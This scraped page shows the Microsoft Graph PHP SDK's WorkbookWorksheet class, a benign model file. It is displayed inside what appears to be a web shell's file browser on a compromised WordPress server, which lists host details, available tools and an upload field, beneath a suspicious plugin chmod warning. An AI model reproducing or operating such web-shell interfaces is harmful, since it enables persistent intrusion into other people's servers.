Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/hopeinstoughton_www/vendor/microsoft/microsoft-graph/src/Model/ |
Upload File : |
<?php
/**
* Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
*
* WorkbookWorksheet File
* PHP version 7
*
* @category Library
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
namespace Microsoft\Graph\Model;
/**
* WorkbookWorksheet class
*
* @category Model
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
class WorkbookWorksheet extends Entity
{
/**
* Gets the name
* The display name of the worksheet.
*
* @return string|null The name
*/
public function getName()
{
if (array_key_exists("name", $this->_propDict)) {
return $this->_propDict["name"];
} else {
return null;
}
}
/**
* Sets the name
* The display name of the worksheet.
*
* @param string $val The name
*
* @return WorkbookWorksheet
*/
public function setName($val)
{
$this->_propDict["name"] = $val;
return $this;
}
/**
* Gets the position
* The zero-based position of the worksheet within the workbook.
*
* @return int|null The position
*/
public function getPosition()
{
if (array_key_exists("position", $this->_propDict)) {
return $this->_propDict["position"];
} else {
return null;
}
}
/**
* Sets the position
* The zero-based position of the worksheet within the workbook.
*
* @param int $val The position
*
* @return WorkbookWorksheet
*/
public function setPosition($val)
{
$this->_propDict["position"] = intval($val);
return $this;
}
/**
* Gets the visibility
* The Visibility of the worksheet. The possible values are: Visible, Hidden, VeryHidden.
*
* @return string|null The visibility
*/
public function getVisibility()
{
if (array_key_exists("visibility", $this->_propDict)) {
return $this->_propDict["visibility"];
} else {
return null;
}
}
/**
* Sets the visibility
* The Visibility of the worksheet. The possible values are: Visible, Hidden, VeryHidden.
*
* @param string $val The visibility
*
* @return WorkbookWorksheet
*/
public function setVisibility($val)
{
$this->_propDict["visibility"] = $val;
return $this;
}
/**
* Gets the charts
* Returns collection of charts that are part of the worksheet. Read-only.
*
* @return array|null The charts
*/
public function getCharts()
{
if (array_key_exists("charts", $this->_propDict)) {
return $this->_propDict["charts"];
} else {
return null;
}
}
/**
* Sets the charts
* Returns collection of charts that are part of the worksheet. Read-only.
*
* @param WorkbookChart[] $val The charts
*
* @return WorkbookWorksheet
*/
public function setCharts($val)
{
$this->_propDict["charts"] = $val;
return $this;
}
/**
* Gets the names
* Returns collection of names that are associated with the worksheet. Read-only.
*
* @return array|null The names
*/
public function getNames()
{
if (array_key_exists("names", $this->_propDict)) {
return $this->_propDict["names"];
} else {
return null;
}
}
/**
* Sets the names
* Returns collection of names that are associated with the worksheet. Read-only.
*
* @param WorkbookNamedItem[] $val The names
*
* @return WorkbookWorksheet
*/
public function setNames($val)
{
$this->_propDict["names"] = $val;
return $this;
}
/**
* Gets the pivotTables
* Collection of PivotTables that are part of the worksheet.
*
* @return array|null The pivotTables
*/
public function getPivotTables()
{
if (array_key_exists("pivotTables", $this->_propDict)) {
return $this->_propDict["pivotTables"];
} else {
return null;
}
}
/**
* Sets the pivotTables
* Collection of PivotTables that are part of the worksheet.
*
* @param WorkbookPivotTable[] $val The pivotTables
*
* @return WorkbookWorksheet
*/
public function setPivotTables($val)
{
$this->_propDict["pivotTables"] = $val;
return $this;
}
/**
* Gets the protection
* Returns sheet protection object for a worksheet. Read-only.
*
* @return WorkbookWorksheetProtection|null The protection
*/
public function getProtection()
{
if (array_key_exists("protection", $this->_propDict)) {
if (is_a($this->_propDict["protection"], "\Microsoft\Graph\Model\WorkbookWorksheetProtection") || is_null($this->_propDict["protection"])) {
return $this->_propDict["protection"];
} else {
$this->_propDict["protection"] = new WorkbookWorksheetProtection($this->_propDict["protection"]);
return $this->_propDict["protection"];
}
}
return null;
}
/**
* Sets the protection
* Returns sheet protection object for a worksheet. Read-only.
*
* @param WorkbookWorksheetProtection $val The protection
*
* @return WorkbookWorksheet
*/
public function setProtection($val)
{
$this->_propDict["protection"] = $val;
return $this;
}
/**
* Gets the tables
* Collection of tables that are part of the worksheet. Read-only.
*
* @return array|null The tables
*/
public function getTables()
{
if (array_key_exists("tables", $this->_propDict)) {
return $this->_propDict["tables"];
} else {
return null;
}
}
/**
* Sets the tables
* Collection of tables that are part of the worksheet. Read-only.
*
* @param WorkbookTable[] $val The tables
*
* @return WorkbookWorksheet
*/
public function setTables($val)
{
$this->_propDict["tables"] = $val;
return $this;
}
}